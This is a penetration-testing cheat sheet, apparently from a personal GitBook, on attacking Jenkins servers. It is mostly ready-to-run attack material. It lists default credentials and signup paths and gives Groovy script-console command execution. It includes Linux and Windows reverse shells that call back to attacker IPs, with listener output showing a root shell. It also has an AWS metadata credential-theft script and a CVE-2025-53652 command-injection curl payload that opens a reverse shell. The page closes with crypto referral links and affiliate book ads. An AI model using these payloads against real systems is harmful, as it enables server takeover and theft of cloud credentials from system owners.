# Jenkins ## Discovery/Footprinting Jenkins runs on Tomcat port 8080 by default. It also utilizes port 5000 to attach slave servers. ## Open Registration ``` /signup /jenkins/signup ``` ## Enumeration `http://jenkins.inlanefreight.local:8000/configureSecurity/`

`http://jenkins.inlanefreight.local:8000/login?from=%2F`

Default credentials such as `admin:admin` or does not have any type of authentication enabled. It is not uncommon to find Jenkins instances that do not require any authentication during an internal penetration test ## Admin access - Script Console Before 2.0: Admin access ``` http://jenkins_server/script ``` Groovy scripts could be executed: #### Linux `http://jenkins.inlanefreight.local:8000/script` ```groovy def cmd = 'id' def sout = new StringBuffer(), serr = new StringBuffer() def proc = cmd.execute() proc.consumeProcessOutput(sout, serr) proc.waitForOrKill(1000) println sout ```

#### Windows ```groovy def cmd = "cmd.exe /c dir".execute(); println("${cmd.text}"); ``` ### Reverse Shell #### Linux ```groovy r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.10.14.15/8443;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() ``` ```shell-session $ nc -lvnp 8443 listening on [any] 8443 ... connect to [10.10.14.15] from (UNKNOWN) [10.129.201.58] 57844 id uid=0(root) gid=0(root) groups=0(root) /bin/bash -i root@app02:/var/lib/jenkins3# ``` #### Metasploit `msf > use exploit/multi/http/jenkins_script_console` #### Windows {% embed url="" %} {% embed url="" %} ```groovy String host="localhost"; int port=8044; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); ``` ## Retrieve AWS credentials Access to Groovy Console ```groovy def tokenCommand = 'curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"' def dataCommand = 'curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/' def proc1 = ['sh', '-c', tokenCommand].execute() def token = proc1.text.trim() // Get the token from the first command proc1.waitFor() if (proc1.exitValue() == 0) { def proc2 = ['sh', '-c', dataCommand.replace('$TOKEN', token)].execute() def errorBuffer = new StringBuffer() proc2.consumeProcessErrorStream(errorBuffer) println(proc2.text) // Print the response println(errorBuffer.toString()) // Print error messages, if any } else { println("Failed to retrieve token: ${proc1.err.text}") } ``` ## No admin access but could add or edit build steps {% embed url="" %} {% embed url="" %} Add a build step, add "Execute Windows Batch Command" and enter:

``` powershell -c command ```

## CVE-2025-53652 - Command Injection via Git Parameter ``` curl -kv 'http://jenkins:8080/job/[buildName]/build' -X POST \ -H 'Cookie: [cookie];' \ --data-urlencode 'Jenkins-Crumb=[crumb]' \ --data-urlencode 'json={"parameter":{"name":"BRANCH_PARAM","value":"\$(bash -c \"bash &> /dev/tcp/10.9.49.196/1270 <&1\")"}}' ``` {% embed url="" %} {% embed url="" %} ## CVE-2024-23897 - Arbitrary File Read Vulnerability Leading to RCE {% embed url="" %} {% embed url="" %} {% embed url="" %} ## CVE-2024-43044 - Arbitrary file read that allows an agent to fetch files from the controller {% embed url="" %} ## Tools JenkinsVulnFinder {% embed url="" %} ## Resources {% embed url="" %} {% embed url="" %} {% embed url="" %} {% embed url="" %} ## [Earn Free Crypto / BTC with Cointiply](https://cointiply.com/r/pkZxp) [**Play Games Earn Cash Rewards**](https://cointiply.com/r/pkZxp)

## Interesting Books {% content-ref url="../../interesting-books" %} [interesting-books](https://0xss0rz.gitbook.io/0xss0rz/interesting-books) {% endcontent-ref %} {% hint style="info" %} **Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you. {% endhint %} * [**The Web Application Hacker’s Handbook**](https://www.amazon.fr/dp/1118026470?tag=0xss0rz-21) The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more * [**Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities**](https://www.amazon.fr/dp/1718501544?tag=0xss0rz-21) Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them * [**Real-World Bug Hunting: A Field Guide to Web Hacking**](https://www.amazon.fr/dp/1593278616?tag=0xss0rz-21) Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.